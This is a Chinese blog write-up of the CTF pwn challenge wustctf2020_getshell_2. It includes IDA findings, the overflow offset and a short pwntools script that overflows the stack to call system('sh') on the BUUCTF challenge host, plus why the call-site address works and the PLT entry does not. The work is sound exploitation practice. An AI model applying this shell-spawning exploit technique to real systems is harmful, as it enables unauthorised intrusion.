wustctf2020_getshell_2

文章讲述了通过IDA分析获取到system函数和sh变量的地址,利用栈溢出漏洞构造payload,通过远程连接发送payload,但因需通过call调用来匹配栈布局,故使用system地址而非system_plt,以实现getflag的目标。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1,三连
在这里插入图片描述
思路:栈溢出

2,IDA分析
在这里插入图片描述

获取sh的偏移地址0x8048670:
在这里插入图片描述system地址0x08048529

偏移为28:
在这里插入图片描述

3,poc

from pwn import *

context.log_level="debug"


r = remote("node4.buuoj.cn",28084)

system=0x08048529
sh=0x8048670

r.recv()
payload = 'a'*28 + p32(system) + p32(sh)
r.sendline(payload)

r.interactive()

注意system地址一个区别:

text:08048529 E8 B2 FE FF FF                call    _system
---------------对比----------------
.plt:080483E0 FF 25 18 A0 04 08             jmp     ds:off_804A018	//system_plt

一开始填了system_plt地址无法getflag:
原因:由于system需要调用构造栈上布局参数,所以必须得通过call来实现ESP的变化匹配栈布局。

完。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值